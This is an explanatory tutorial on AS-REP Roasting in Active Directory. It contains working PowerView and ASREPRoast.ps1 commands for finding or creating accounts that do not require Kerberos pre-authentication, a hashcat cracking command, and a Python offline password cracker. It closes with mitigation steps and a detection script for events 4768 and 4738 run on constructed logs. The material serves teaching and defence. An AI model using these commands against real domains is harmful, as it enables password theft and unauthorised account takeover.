AS-REP Roasting is a technique that abuses the Kerberos initial authentication exchange with the Key Distribution Centre (KDC) against accounts that are configured not to require pre-authentication.

During initial authentication a user requests a Ticket Granting Ticket (TGT) from the KDC by sending an AS-REQ. With pre-authentication enabled (the default), the client must first prove it knows the account's key, normally by sending a timestamp encrypted with a key derived from the account's password. If that proof checks out and the account exists, the KDC returns an AS-REP that carries the TGT (encrypted with the krbtgt key) plus a part, including the session key, encrypted with the account's own key, so only a user or machine holding the account's credentials can decrypt that part.

When pre-authentication is not required for an account, the KDC skips that proof: anyone able to send an AS-REQ to the KDC can request an AS-REP for that account, and the AS-REQ itself carries no credentials. The attacker thereby obtains a blob encrypted with the user's key and can brute-force it offline against a wordlist, with no further traffic to the domain controller.

If a user's UserAccountControl has "Do not require Kerberos preauthentication" set, i.e. Kerberos pre-auth is disabled for that account, it is possible to grab the user's crackable AS-REP and brute-force it offline.

Enumerating accounts with Kerberos pre-auth disabled using PowerView

Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

If we want to check a specific user we can do

Get-DomainUser username | ConvertFrom-UACValue

and check whether the decoded flags include DONT_REQ_PREAUTH.


If pre-auth is not disabled on the target but we hold GenericWrite or GenericAll over the user object, we can disable it ourselves by setting the DONT_REQ_PREAUTH flag (0x400000, decimal 4194304) in the user's userAccountControl:

Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose

Note that -XOR toggles the bit rather than setting it: check the current value first (ConvertFrom-UACValue as above) so you do not clear a flag that was already set, and run the same command again when finished to restore the original value. The change is written to the user object and will show up in the directory's change auditing.

Requesting the encrypted AS-REP for offline brute force

We will use ASREPRoast.ps1, but Rubeus (its asreproast action) can do the same.

The Get-ASREPHash function wraps New-ASReq to build the appropriate AS-REQ for a given user and domain, locates a domain controller for that domain, sends the crafted AS-REQ, receives the response bytes and extracts the crackable part of the AS-REP as a hash string.

Get-ASREPHash -Domain domain -UserName username -Verbose

We can also use the Invoke-ASREPRoast function to find all users that do not require Kerberos pre-authentication and request a hash for each of them in one go:

Invoke-ASREPRoast -Verbose | fl

Cracking AS-REP hashes with hashcat

ASREPRoast.ps1 prints the hash in John the Ripper format. hashcat mode 18200 expects the encryption type after the $krb5asrep$ prefix (23 is RC4-HMAC, the etype these AS-REPs normally use), so we need to insert 23 like this:

$krb5asrep$23$admin@first.local:….

and crack it:

hashcat -m 18200 -a 0 -O '$krb5asrep$23$admin@first.local:...' /path/to/wordlist

-a 0 is the straight wordlist attack; -a 3 is mask mode and would treat the wordlist path as a mask. -O selects the optimized kernels, which cap the candidate password length, so drop it if the wordlist contains long entries. Mode 18200 only handles etype 23; if the KDC returned an AES-encrypted AS-REP (etype 17 or 18), the number after $krb5asrep$ will differ and a matching hashcat mode is required.
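The following Python script is an added example; it is not part of the original post, of ASREPRoast.ps1 or of hashcat. It implements the etype-23 (RC4-HMAC, RFC 4757) check that hashcat mode 18200 performs on each candidate password, converts a John-format line as printed by ASREPRoast.ps1 into the hashcat format shown above, and runs a small dictionary attack against a constructed sample. This also shows concretely why the AS-REP described at the start of the post can be cracked offline: the only secret involved is the NT hash (MD4 of the UTF-16LE password), so every guess is just a local HMAC-MD5 and RC4 computation. The sample password, the placeholder enc-part plaintext, the wordlist and all function names are assumptions made for this example; admin@first.local is the principal used on this page.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
AS_REP_ENC_PART_USAGE = 8  # RFC 4120 key usage number for the AS-REP enc-part


def md4(data: bytes) -> bytes:
    """Plain MD4 (RFC 1320), since many OpenSSL builds disable it in hashlib."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + t) & MASK32 for s, t in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:  # the NT hash is the etype-23 (RC4-HMAC) Kerberos key
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i, j = (i + 1) & 0xFF, (j + s[(i + 1) & 0xFF]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 RC4-HMAC encryption: returns checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))  # K2 == K1 for etype 23
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    return checksum + rc4(hmac_md5(k1, checksum), data)


def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """One cracker trial: decrypt under the candidate key and test the HMAC."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    plaintext = rc4(hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)


def john_to_hashcat(line: str, etype: int = 23) -> str:
    """ASREPRoast.ps1 prints '$krb5asrep$user@realm:...'; hashcat -m 18200 wants the etype after the prefix."""
    prefix = "$krb5asrep$"
    if not line.startswith(prefix):
        raise ValueError("not an AS-REP hash line")
    rest = line[len(prefix):]
    return line if rest.startswith(f"{etype}$") else f"{prefix}{etype}${rest}"


def crack_asrep(line: str, wordlist):
    """Offline dictionary attack on a '$krb5asrep$23$user@realm:<checksum>$<edata>' line."""
    parts = line.split("$")  # ['', 'krb5asrep', '23', 'user@realm:checksumhex', 'edatahex']
    if len(parts) != 5 or parts[1] != "krb5asrep" or parts[2] != "23":
        raise ValueError("expected an etype-23 hashcat AS-REP line")
    checksum, edata = bytes.fromhex(parts[3].split(":", 1)[1]), bytes.fromhex(parts[4])
    for candidate in wordlist:  # no further traffic to the DC is needed from here on
        if rc4_hmac_check(nt_hash(candidate), AS_REP_ENC_PART_USAGE, checksum, edata):
            return candidate
    return None


# Constructed sample (not captured data): an enc-part for admin@first.local under an assumed
# password. A real EncASRepPart is ASN.1; any plaintext exercises the HMAC check equally well.
SAMPLE_PASSWORD = "Summer2023!"
FAKE_ENC_PART = b"\x79\x81\x10" + b"EncASRepPart placeholder bytes " * 3
WORDLIST = ["password", "Winter2022!", "Summer2023!", "admin"]


def build_sample_john_line() -> str:
    edata = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), AS_REP_ENC_PART_USAGE,
                             FAKE_ENC_PART, b"\x00" * 8)  # fixed confounder: reproducible sample
    return f"$krb5asrep$admin@first.local:{edata[:16].hex()}${edata[16:].hex()}"
```

Calling crack_asrep(john_to_hashcat(build_sample_john_line()), WORDLIST) returns the sample password. The 16 bytes before the $ in the hash are the HMAC-MD5 checksum, which is exactly the verifier a cracker tests each guess against; the script handles etype 23 only, matching hashcat mode 18200.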

Mitigation

To defend against AS-REP Roasting, find the user accounts that are set to not require Kerberos pre-authentication and remove that setting wherever it is not strictly needed. The Active Directory module can list them with a filter on the corresponding userAccountControl bit:

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Another countermeasure, for any account that must keep pre-authentication disabled, is a long, complex password that does not appear in breached wordlists, so that the captured AS-REP does not fall to a dictionary attack. The attack also leaves traces on the domain controller: every AS-REP handed out without pre-authentication is logged as event 4768 with Pre-Authentication Type 0, a sweep of several such accounts from a single host is easy to spot, and enabling "Don't Require Preauth" on a user is recorded in event 4738, so these events are worth alerting on.
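As an added example (not part of the original post), the following Python script runs those detection checks over a handful of constructed Security-log events. The events are hand-built dictionaries shaped like the EventData fields of 4768 (TGT requested: TargetUserName, IpAddress, PreAuthType, TicketEncryptionType, Status) and 4738 (user account changed: SubjectUserName, TargetUserName, UserAccountControl). Timestamps, usernames, addresses, the detection thresholds and the exact "'Don't Require Preauth' - Enabled" wording of the 4738 text are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data), shaped like Security-log EventData fields.
SAMPLE_EVENTS = [
    {"EventID": 4738, "Time": "2024-03-01T08:55:00", "SubjectUserName": "bob",
     "TargetUserName": "svc_legacy", "UserAccountControl": "'Don't Require Preauth' - Enabled"},
    {"EventID": 4768, "Time": "2024-03-01T09:00:01", "TargetUserName": "alice",
     "IpAddress": "::ffff:10.0.0.5", "PreAuthType": "2",   # timestamp pre-auth, AES: normal logon
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "Time": "2024-03-01T09:00:05", "TargetUserName": "svc_backup",
     "IpAddress": "::ffff:10.0.0.77", "PreAuthType": "0",  # no pre-auth, RC4: roastable AS-REP issued
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "Time": "2024-03-01T09:00:06", "TargetUserName": "svc_legacy",
     "IpAddress": "::ffff:10.0.0.77", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "Time": "2024-03-01T09:00:07", "TargetUserName": "ghost",
     "IpAddress": "::ffff:10.0.0.77", "PreAuthType": "0",  # 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN: no ticket
     "TicketEncryptionType": "0x17", "Status": "0x6"},
]


def roastable_tgt_requests(events):
    """4768 events where the KDC issued a TGT without pre-authentication (PreAuthType 0, Status 0x0)."""
    hits = []
    for e in events:
        if e["EventID"] == 4768 and e["PreAuthType"] == "0" and e["Status"] == "0x0":
            hits.append({"user": e["TargetUserName"], "source": e["IpAddress"],
                         # etype 0x17 (RC4-HMAC) is what hashcat -m 18200 cracks: the worst case
                         "rc4": e["TicketEncryptionType"] == "0x17"})
    return hits


def asrep_sweeps(events, min_targets=2, window=timedelta(minutes=5)):
    """Sources that obtained no-pre-auth AS-REPs for several different accounts within one window."""
    per_source = defaultdict(list)
    for e in events:
        if roastable_tgt_requests([e]):
            per_source[e["IpAddress"]].append((datetime.fromisoformat(e["Time"]), e["TargetUserName"]))
    sweeps = {}
    for source, reqs in per_source.items():
        reqs.sort()
        for idx, (start, _) in enumerate(reqs):  # slide the window over this source's requests
            users = {user for t, user in reqs[idx:] if t - start <= window}
            if len(users) >= min_targets:
                sweeps[source] = users
                break
    return sweeps


def preauth_disabled_changes(events):
    """4738 events where someone enabled 'Don't Require Preauth' (the Set-DomainObject step above)."""
    return [(e["TargetUserName"], e["SubjectUserName"]) for e in events
            if e["EventID"] == 4738
            and "'Don't Require Preauth' - Enabled" in e.get("UserAccountControl", "")]
```

On the sample, roastable_tgt_requests flags svc_backup and svc_legacy (alice pre-authenticated, and the request for ghost failed, so no AS-REP was issued), asrep_sweeps attributes both to 10.0.0.77, and preauth_disabled_changes shows bob enabling the flag on svc_legacy five minutes earlier, which is the sequence an attacker with GenericWrite would produce.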